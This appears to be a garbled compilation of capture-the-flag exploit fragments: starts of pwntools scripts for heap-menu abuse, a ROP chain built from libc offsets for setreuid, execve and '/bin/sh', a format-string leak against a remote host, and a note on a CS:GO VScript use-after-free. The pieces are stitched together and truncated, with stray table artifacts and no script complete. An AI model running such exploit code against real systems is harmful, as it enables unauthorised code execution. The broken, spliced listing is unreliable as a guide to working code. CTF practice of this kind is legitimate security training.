Discord flag.
Brute-force byte by byte, applying the encrypt function to verify each candidate.
from pwn import *
from pwn import * | |
# Target is a 64-bit Linux binary run as a local process.  The libc ELF is
# parsed here for use later in the script (those lines are not in this excerpt).
context.os = 'linux'
context.arch = 'amd64'
r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def new(size, data, abuse_scanf=0):
    """Select menu item ``1`` on the target process ``r`` and send a size.

    Sends ``b'1'`` at the ``'> '`` prompt, then the decimal ``size`` at the
    ``': '`` prompt with ``abuse_scanf`` leading ``'0'`` characters prepended
    (none by default).  ``data`` is not used in the lines visible here; the
    listing appears to be truncated after the size prompt.
    """
    r.sendlineafter(b'> ', b'1')
    zero_prefix = b'0' * abuse_scanf
    size_field = zero_prefix + str(size).encode()
    r.sendlineafter(b': ', size_field)
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdarg.h> | |
#include <string.h> | |
#include <fcntl.h> | |
#include <unistd.h> | |
#include <sys/mman.h> | |
#define INFO "[*] " |
#!/usr/bin/env python3 | |
import struct | |
import sys | |
# argv[1] is a hex address; subtracting the fixed constant presumably yields
# the libc base (the constant's origin is not visible in this excerpt).
leaked_address = int(sys.argv[1], 16)
libc = leaked_address - 0x270b3
# libc-relative constants, reproduced verbatim from the listing.  They are
# specific to one libc build; verify against the target's libc before use.
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
#!/usr/bin/env python3 | |
from pwn import * | |
# Reset pwntools context to a little-endian amd64 Linux target, then connect.
context.clear(arch='amd64', os='linux', endian='little')
HOST, PORT = '125.235.240.166', 33333
r = remote(HOST, PORT)
# 1st boss
first_input = b'%p'  # reproduced verbatim from the listing
r.sendline(first_input)
#!/usr/bin/env python3 | |
from pwn import * | |
context.clear(arch='amd64', os='linux', endian='little') | |
# Parse the provided libc build, then connect to the remote service.
libc = ELF('./libc-2.31.so')
MY_IP = b''  # left empty in the listing; presumably filled in before running
HOST, PORT = '125.235.240.166', 20120
r = remote(HOST, PORT)
This challenge involves an old version of CS:GO VScript, which is vulnerable to a use-after-free (UAF) bug and a type-confusion bug.
The sort function of a Squirrel array is `array_sort` in sqbaselib.cpp, which will call `_qsort`:
// v: VM, o: array object, func: compare func
#!/usr/bin/env python3 | |
from pwn import * | |
# amd64 Linux target; `terminal` is the command pwntools uses when it needs
# to open a new window (e.g. for a debugger).  Keys are applied in this order.
context.update(os='linux', arch='amd64', terminal=['tmux', 'new-window'])
l = ELF('./libc-2.31.so')
#!/usr/bin/env python3 | |
from pwn import * | |
# amd64 Linux target; `terminal` is the command pwntools uses when it needs
# to open a new window (e.g. for a debugger).  Keys are applied in this order.
context.update(
    os='linux',
    arch='amd64',
    terminal=['tmux', 'sp', '-v', '-p', '90'],
)
# Target binary and the system libc it is expected to run against.
b = ELF('./secret_keeper')
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
#!/usr/bin/env python3 | |
from pwn import * | |
# amd64 Linux target; the binary and its bundled libc are parsed up front.
context.update(os='linux', arch='amd64')
b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')
# Command pwntools uses when it needs to open a new window (e.g. for a
# debugger); set after the ELFs are loaded, as in the original.
context.terminal = ['tmux', 'sp', '-h', '-p', '80']